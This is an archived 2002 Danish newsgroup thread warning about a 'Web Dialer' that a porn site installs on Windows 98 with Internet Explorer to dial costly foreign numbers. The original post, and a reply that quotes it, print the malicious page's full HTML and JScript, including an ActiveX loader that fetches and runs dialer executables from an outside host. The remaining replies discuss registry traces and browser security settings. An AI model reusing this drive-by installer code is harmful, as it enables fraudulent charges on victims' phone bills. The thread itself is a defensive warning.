/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
web dialer / automatisk opkald via modem t~
Fra : 15kw


Dato : 04-06-02 23:15

Hej

Der var for noget tid siden en masse debat om folk der havde fået nogle
store telefon regninger for opkald til udenlanske servere. I den
forbindelse blev der efterlyst steder på nettet hvor den slaks ting kan
foregå uden brugerens egen indgriben / vilje.
Jeg var tidligere i aften ude ved en bekendt som lige havde det problem at
han
havde været inde på en lidt snusket side på nettet hvorefter
Internet-explore lukker og et program "Web
Dialer" starter og forsøger at ringe til et nummer i udlandet.


PS Han køre Win98 / internetexplore vertion 5,5

Programmet hentes og gemmes automatisk herefter gemmes programmet som en exe
fil på skrivebordet og i mappen c:\windows, der oprettes en genvej på
skrivebordet til programmet i Win mappen.
Når programmet er instaleret starter det automatisk og forsøger at ringe et
nummer op via modem.



PAS PÅ DET KAN BLIVE DYRT AT LEGE MED DISSE LINK.

Her er et link til siden
TRYK IKKE PÅ LINKET HVIS DU HAR TILSLUTTET TELEFON MODEM TIL COMPUTEREN.
http://wet-sex-boom.XXX/diana/snakes.html
XXX erstattes med com

Her er et link til popup siden
TRYK IKKE PÅ LINKET HVIS DU HAR TILSLUTTET TELEFON MODEM TIL COMPUTEREN.
http://download2.0190-dialers.XXX/result.cfm?srcUrl=http://download2.0190-di
alers.com/dialers/5-4-17-2.exe&fgc=FFFFFF&bgc=2C62A0&status=success
XXX erstattes med com


Her er lige lidt HTML kode som jeg har findet i internettemporeri files



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Download</TITLE>
<META HTTP-EQUIV=Content-Type CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV=Expires CONTENT=0>
<META CONTENT="MSHTML 5.50.4522.1800" NAME=GENERATOR>

<SCRIPT language='JScript'>
<!--
var VLoadInstalled = 1;
var nAttempt = 1;

window.onerror = errorwindow;
function errorwindow(sMsg,sUrl,sLine){ VLoadInstalled = 0; return true; }
function Reload() {
window.location.replace('http://download2.0190-dialers.com/autoload.cfm?src=
5-4-17-2.exe&tgt=5-4-17-2.exe&dir=dialers&auto=1&fgc=FFFFFF&bgc=2C62A0&vid=&
AttemptAL=1'); return; }
function DUnsuccess() {
window.location.replace('http://download2.0190-dialers.com/result.cfm?srcUrl
=http://download2.0190-dialers.com/dialers/5-4-17-2.exe&fgc=FFFFFF&bgc=2C62A
0&status=unsuccess'); }
function DSuccess() {
window.location.replace('http://download2.0190-dialers.com/result.cfm?srcUrl
=http://download2.0190-dialers.com/dialers/5-4-17-2.exe&fgc=FFFFFF&bgc=2C62A
0&status=success'); }

function ErrorActiveX() {
VLoadInstalled = 0;
if(nAttempt < 2) {
Reload();
alert('Sie müssen die Installationsroutine mit <JA> bestätigen,\ndamit die
Seite korrekt angezeigt werden kann.');
}
else
{
if( confirm('Sie haben die Zugangssoftware nicht installiert.\nUm die
Seite korrekt anzuzeigen,\nmüssen Sie diese Software installieren.\n\nWollen
Sie die Software jetzt installieren?') ) {
nAttempt = 1 ;
Reload();
}
else
{
DUnsuccess();
}
}
return true;
}

function VStart() {
if (VLoadInstalled == 1) {
if (VLoadX.LoadModule('dialers', '5-4-17-2.exe', '5-4-17-2.exe',
'http://download2.0190-dialers.com/ax.cfm', '', '-d-t') == 0) {
DUnsuccess();
}
else {
DSuccess();
}
}
else
{
if (nAttempt < 2) {
Reload();
}
else {
DUnsuccess();
}
}
return true;
}

//-->
</SCRIPT>


</HEAD>
<BODY BGCOLOR='2C62A0' TEXT='FFFFFF' onselectstart='return false;'
ondragstart='return false;' onload='VStart()'>
<B>
<TABLE HEIGHT=100% CELLSPACING=0 CELLPADDING=0 WIDTH=100% ALIGN=center
BORDER=0 VALIGN=middle>
<TR><TD>
<TABLE CELLSPACING=1 CELLPADDING=0 WIDTH=48% ALIGN=center BORDER=0
VALIGN=middle>
<TR>
<TD NOWRAP HEIGHT=90 ALIGN=center>
<CENTER>
<FONT face='Verdana, Arial, Helvetica, sans-serif' size=2><B>

<OBJECT ONERROR='ErrorActiveX();' ID='VLoadX'
CLASSID='CLSID:11BF0E2B-4229-4ADC-9C11-1C6968731018'
CODEBASE='VLoading.cab##Version=1,0,0,2' WIDTH='350' height=30
STANDBY='Loading....'>
Error occured
</OBJECT>

<BR><HR>

<P>Please wait a few seconds ...</P>
<P>
YOU ARE JUST ONE STEP AWAY FROM COMPLETE ACCESS...
<BR><BR>
The system is currently setting up your connection.
<BR>
No special operation or intervention is required.
<BR>
In a few seconds you will have unlimited access
<BR>to our entire Network. And Enjoy !
</P>
<P>
<IMG SRC=http://download2.0190-dialers.com/bus.jpg>
<BR>Just press YES in the dialog box.
<BR>This operation is totally safe and certified.
<BR>If an auto-download does not initiate within
<BR>5 seconds, please CLICK below to start.<BR>
</FONT></FONT>
</P>
<P>
<FONT face='Verdana, Arial, Helvetica, sans-serif' size=2>
Should the automatic download not start,<A
HREF=http://download2.0190-dialers.com/dialers/5-4-17-2.exe>click
here</A>...<BR><BR>
Falls der automatischen Download nicht startet, bitte<A
HREF=http://download2.0190-dialers.com/dialers/5-4-17-2.exe>hier
klicken</A>...<BR><BR>
Si no funcionara el download automaticamente, haz<A
HREF=http://download2.0190-dialers.com/dialers/5-4-17-2.exe>click
aqui</A>...
</B>
</FONT>
</P>
</CENTER>
</TD></TR></TABLE></TD></TR></TABLE>
<HR>
</BODY>
</HTML>







--
Hilsen
Peter N Petersen








 
 
Spook (05-06-2002)
Kommentar
Fra : Spook


Dato : 05-06-02 10:40

Den lægger sig også i registreringsdatabasen...

--
Jens Jensen
www.amarc.dk & www.amarc.dk/spb



"15kw" <nospam15kw@tdcadsl.dk> skrev i en meddelelse
news:3cfd3c92$0$47917$edfadb0f@dspool01.news.tele.dk...
> Hej
>
> Der var for noget tid siden en masse debat om folk der havde fået nogle
> store telefon regninger for opkald til udenlanske servere. I den
> forbindelse blev der efterlyst steder på nettet hvor den slaks ting kan
> foregå uden brugerens egen indgriben / vilje.
> Jeg var tidligere i aften ude ved en bekendt som lige havde det problem at
> han
> havde været inde på en lidt snusket side på nettet hvorefter
> Internet-explore lukker og et program "Web
> Dialer" starter og forsøger at ringe til et nummer i udlandet.
>
>
> PS Han køre Win98 / internetexplore vertion 5,5
>
> Programmet hentes og gemmes automatisk herefter gemmes programmet som en
exe
> fil på skrivebordet og i mappen c:\windows, der oprettes en genvej på
> skrivebordet til programmet i Win mappen.
> Når programmet er instaleret starter det automatisk og forsøger at ringe
et
> nummer op via modem.
>
>
>
> PAS PÅ DET KAN BLIVE DYRT AT LEGE MED DISSE LINK.
>
> Her er et link til siden
> TRYK IKKE PÅ LINKET HVIS DU HAR TILSLUTTET TELEFON MODEM TIL COMPUTEREN.
> http://wet-sex-boom.XXX/diana/snakes.html
> XXX erstattes med com
>
> Her er et link til popup siden
> TRYK IKKE PÅ LINKET HVIS DU HAR TILSLUTTET TELEFON MODEM TIL COMPUTEREN.
>
http://download2.0190-dialers.XXX/result.cfm?srcUrl=http://download2.0190-di
> alers.com/dialers/5-4-17-2.exe&fgc=FFFFFF&bgc=2C62A0&status=success
> XXX erstattes med com
>
>
> Her er lige lidt HTML kode som jeg har findet i internettemporeri files
>
>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML>
> <HEAD>
> <TITLE>Download</TITLE>
> <META HTTP-EQUIV=Content-Type CONTENT="text/html; charset=iso-8859-1">
> <META HTTP-EQUIV=Expires CONTENT=0>
> <META CONTENT="MSHTML 5.50.4522.1800" NAME=GENERATOR>
>
> <SCRIPT language='JScript'>
> <!--
> var VLoadInstalled = 1;
> var nAttempt = 1;
>
> window.onerror = errorwindow;
> function errorwindow(sMsg,sUrl,sLine){ VLoadInstalled = 0; return true; }
> function Reload() {
>
window.location.replace('http://download2.0190-dialers.com/autoload.cfm?src=
>
5-4-17-2.exe&tgt=5-4-17-2.exe&dir=dialers&auto=1&fgc=FFFFFF&bgc=2C62A0&vid=&
> AttemptAL=1'); return; }
> function DUnsuccess() {
>
window.location.replace('http://download2.0190-dialers.com/result.cfm?srcUrl
>
=http://download2.0190-dialers.com/dialers/5-4-17-2.exe&fgc=FFFFFF&bgc=2C62A
> 0&status=unsuccess'); }
> function DSuccess() {
>
window.location.replace('http://download2.0190-dialers.com/result.cfm?srcUrl
>
=http://download2.0190-dialers.com/dialers/5-4-17-2.exe&fgc=FFFFFF&bgc=2C62A
> 0&status=success'); }
>
> function ErrorActiveX() {
> VLoadInstalled = 0;
> if(nAttempt < 2) {
> Reload();
> alert('Sie müssen die Installationsroutine mit <JA> bestätigen,\ndamit
die
> Seite korrekt angezeigt werden kann.');
> }
> else
> {
> if( confirm('Sie haben die Zugangssoftware nicht installiert.\nUm die
> Seite korrekt anzuzeigen,\nmüssen Sie diese Software
installieren.\n\nWollen
> Sie die Software jetzt installieren?') ) {
> nAttempt = 1 ;
> Reload();
> }
> else
> {
> DUnsuccess();
> }
> }
> return true;
> }
>
> function VStart() {
> if (VLoadInstalled == 1) {
> if (VLoadX.LoadModule('dialers', '5-4-17-2.exe', '5-4-17-2.exe',
> 'http://download2.0190-dialers.com/ax.cfm', '', '-d-t') == 0) {
> DUnsuccess();
> }
> else {
> DSuccess();
> }
> }
> else
> {
> if (nAttempt < 2) {
> Reload();
> }
> else {
> DUnsuccess();
> }
> }
> return true;
> }
>
> //-->
> </SCRIPT>
>
>
> </HEAD>
> <BODY BGCOLOR='2C62A0' TEXT='FFFFFF' onselectstart='return false;'
> ondragstart='return false;' onload='VStart()'>
> <B>
> <TABLE HEIGHT=100% CELLSPACING=0 CELLPADDING=0 WIDTH=100% ALIGN=center
> BORDER=0 VALIGN=middle>
> <TR><TD>
> <TABLE CELLSPACING=1 CELLPADDING=0 WIDTH=48% ALIGN=center BORDER=0
> VALIGN=middle>
> <TR>
> <TD NOWRAP HEIGHT=90 ALIGN=center>
> <CENTER>
> <FONT face='Verdana, Arial, Helvetica, sans-serif' size=2><B>
>
> <OBJECT ONERROR='ErrorActiveX();' ID='VLoadX'
> CLASSID='CLSID:11BF0E2B-4229-4ADC-9C11-1C6968731018'
> CODEBASE='VLoading.cab##Version=1,0,0,2' WIDTH='350' height=30
> STANDBY='Loading....'>
> Error occured
> </OBJECT>
>
> <BR><HR>
>
> <P>Please wait a few seconds ...</P>
> <P>
> YOU ARE JUST ONE STEP AWAY FROM COMPLETE ACCESS...
> <BR><BR>
> The system is currently setting up your connection.
> <BR>
> No special operation or intervention is required.
> <BR>
> In a few seconds you will have unlimited access
> <BR>to our entire Network. And Enjoy !
> </P>
> <P>
> <IMG SRC=http://download2.0190-dialers.com/bus.jpg>
> <BR>Just press YES in the dialog box.
> <BR>This operation is totally safe and certified.
> <BR>If an auto-download does not initiate within
> <BR>5 seconds, please CLICK below to start.<BR>
> </FONT></FONT>
> </P>
> <P>
> <FONT face='Verdana, Arial, Helvetica, sans-serif' size=2>
> Should the automatic download not start,<A
> HREF=http://download2.0190-dialers.com/dialers/5-4-17-2.exe>click
> here</A>...<BR><BR>
> Falls der automatischen Download nicht startet, bitte<A
> HREF=http://download2.0190-dialers.com/dialers/5-4-17-2.exe>hier
> klicken</A>...<BR><BR>
> Si no funcionara el download automaticamente, haz<A
> HREF=http://download2.0190-dialers.com/dialers/5-4-17-2.exe>click
> aqui</A>...
> </B>
> </FONT>
> </P>
> </CENTER>
> </TD></TR></TABLE></TD></TR></TABLE>
> <HR>
> </BODY>
> </HTML>
>
>
>
>
>
>
>
> --
> Hilsen
> Peter N Petersen
>
>
>
>
>
>
>



15kw (05-06-2002)
Kommentar
Fra : 15kw


Dato : 05-06-02 10:49


"Spook" <spook_nuke@tdcadsll.dk> skrev i en meddelelse
news:3cfddbc7$0$8956$edfadb0f@dspool01.news.tele.dk...
> Den lægger sig også i registreringsdatabasen...
>

Det har du ret i.

Den opretter også en mappe C:\Webdnews der indeholder en index.html fill og
nogle gif filer.


--
Hilsen
Peter N Petersen




Chr. Bohr-Halling (05-06-2002)
Kommentar
Fra : Chr. Bohr-Halling


Dato : 05-06-02 11:40

"15kw" <nospam15kw@tdcadsl.dk> posting:

>fil på skrivebordet og i mappen c:\windows, der oprettes en genvej på
>skrivebordet til programmet i Win mappen.

Hvordan det? Fordi du har downloadet programmet, køres det vel ikke
automatisk?

>Når programmet er instaleret starter det automatisk og forsøger at ringe et
>nummer op via modem.

Det skal da køres før der kan ske noget? Eller IE er måske så flink,
at den selv henter programmer, installer dem og kører dem bagefter.
Føj, sådan en browser ville jeg smide ud med det samme!

>TRYK IKKE PÅ LINKET HVIS DU HAR TILSLUTTET TELEFON MODEM TIL COMPUTEREN.

Joda...

>http://wet-sex-boom.XXX/diana/snakes.html
>XXX erstattes med com

http://home12.inet.tele.dk/chrmax/temp/dial.gif
Og så siger man selvfølgelig nej.

--
0100010001100101011101000111010001100101001000000110010101110010
0010000001100101011011100010000001110011011010010110011101101110
01100001011101000111010101110010
(8bit)

Kent Friis (05-06-2002)
Kommentar
Fra : Kent Friis


Dato : 05-06-02 11:50

Den Wed, 05 Jun 2002 12:39:44 +0200 skrev Chr. Bohr-Halling:
>
>http://home12.inet.tele.dk/chrmax/temp/dial.gif
>Og så siger man selvfølgelig nej.

Jamen hov, er det ikke... ? Med det efternavn, kan det sg* ikke være
andre (og Opera er også et tydeligt tegn). Kommer du ikke over i sjatten
igen?

Mvh
Kent

FUT: dk.snak
--
"Intelligence is the ability to avoid doing work, yet get the work done"
- Linus Torvalds

15kw (05-06-2002)
Kommentar
Fra : 15kw


Dato : 05-06-02 12:13


"Chr. Bohr-Halling" <nospam@direkte.org> skrev i en meddelelse
news:a3qrfu0mpc7pkrb46qqtd7776se6m59otl@dtext.news.tele.dk...
> "15kw" <nospam15kw@tdcadsl.dk> posting:
>
> >fil på skrivebordet og i mappen c:\windows, der oprettes en genvej på
> >skrivebordet til programmet i Win mappen.
>
> Hvordan det? Fordi du har downloadet programmet, køres det vel ikke
> automatisk?
>
> >Når programmet er instaleret starter det automatisk og forsøger at ringe
et
> >nummer op via modem.
>
> Det skal da køres før der kan ske noget? Eller IE er måske så flink,
> at den selv henter programmer, installer dem og kører dem bagefter.
> Føj, sådan en browser ville jeg smide ud med det samme!
>
Download, installation og start af programmet sker helt uden brugerens
indblanden og i et popup vindue i baggrunden så man ser ikke noget som helst
før det er for sent (internet-explore lukker og den eksisterende, opkalds
forbindelse til ens internet udbyder termineres og programmet prøver at
ringe et andet nummer op).



--
Hilsen
Peter N Petersen







Chr. Bohr-Halling (05-06-2002)
Kommentar
Fra : Chr. Bohr-Halling


Dato : 05-06-02 19:30

"15kw" <nospam15kw@tdcadsl.dk> posting:

>Download, installation og start af programmet sker helt uden brugerens
>indblanden og i et popup vindue i baggrunden så man ser ikke noget som helst

Uden at have undersøgt det nærmere, men mon ikke det er noget MS
Active X-noget? Mon så ikke bare MS/IE skulle holde sig til
Java-vejen, hvor der i apples modsat 'rigtige' java-programmer er
begrænsninger på netop bl.a. filadgangen til klienten -- men Java
har MS vist droppet (= ikke præinstalleret sammen med IE?)

>før det er for sent (internet-explore lukker og den eksisterende, opkalds
>forbindelse til ens internet udbyder termineres og programmet prøver at
>ringe et andet nummer op).

Wow -- til kommunekemi med den browser, det lokale rensningsanlæg er
ikke forsvarligt.

--
0100010001100101011101000111010001100101001000000110010101110010
0010000001100101011011100010000001110011011010010110011101101110
01100001011101000111010101110010
(8bit)

Peder Vendelbo Mikke~ (05-06-2002)
Kommentar
Fra : Peder Vendelbo Mikke~


Dato : 05-06-02 21:39

15kw skrev:

> Download, installation og start af programmet sker helt uden bruge-
> rens indblanden

Tjek hvordan sikkerhedszonerne er opsat, det tyder på at IE kører med
laveste sikkerhed. Lav eventuelt en custom indstilling som ikke auto-
matisk afvikler noget som helst uden at spørge brugeren først.
--
Fix Outlook Express 5.*:
<URL: http://home.in.tum.de/~jain/software/quotefix.php >


Søg
Reklame
Statistik
Spørgsmål : 177549
Tips : 31968
Nyheder : 719565
Indlæg : 6408820
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste